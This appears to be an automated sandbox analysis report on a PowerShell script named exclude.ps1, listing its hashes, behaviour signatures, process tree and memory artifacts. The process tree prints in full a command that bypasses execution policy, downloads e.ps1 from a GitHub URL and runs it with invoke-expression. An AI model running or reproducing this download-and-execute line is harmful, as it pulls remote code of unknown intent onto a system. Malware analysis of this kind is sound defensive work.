Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    17-01-2025 06:15

General

  • Target

    i965652f-main/exclude.ps1

  • Size

    979B

  • MD5

    22b7c77e64476f1842845f1529369794

  • SHA1

    b034134dfe982c73793a897278301d05a87a31a4

  • SHA256

    cdcfc9b6d8e0a133e249819859bd5d4aa303dd128ac326ce50d32dcfa884bc56

  • SHA512

    dd32593c528705522f6380ea4751c7c86a18d3a901094ef71babbf12f3ab5aee538052c033d7ca19d622af1b230e1a5fea627608e280b8913d8e63c85f69d752

Score
3/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\exclude.ps1
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2672
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command $pl = iwr https://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/e.ps1; invoke-expression $pl
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2584

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    15949652452d63a0038444a725cc7945

    SHA1

    a3da3f48ae9ef882ec9cb2b089684a7aa755ebe6

    SHA256

    ecb4c8f2a83ee45e03f6c591ed6b20ee244d80429b43b66317dd59677c14eb2c

    SHA512

    4be22050b6bc257c842b85d14f5bc01d2487344b815f328a7139ade6895215799ed5750b6fbf14d8dbdfac4b8f9b8f85dd46d9c7564163349d1cfcb2edbcd2ce

  • memory/2584-18-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

    Filesize

    9.6MB

  • memory/2584-19-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

    Filesize

    9.6MB

  • memory/2672-4-0x000007FEF5CEE000-0x000007FEF5CEF000-memory.dmp

    Filesize

    4KB

  • memory/2672-5-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

    Filesize

    2.9MB

  • memory/2672-7-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

    Filesize

    9.6MB

  • memory/2672-8-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

    Filesize

    9.6MB

  • memory/2672-6-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

    Filesize

    32KB

  • memory/2672-9-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

    Filesize

    9.6MB

  • memory/2672-10-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

    Filesize

    9.6MB

  • memory/2672-11-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

    Filesize

    9.6MB

  • memory/2672-17-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

    Filesize

    9.6MB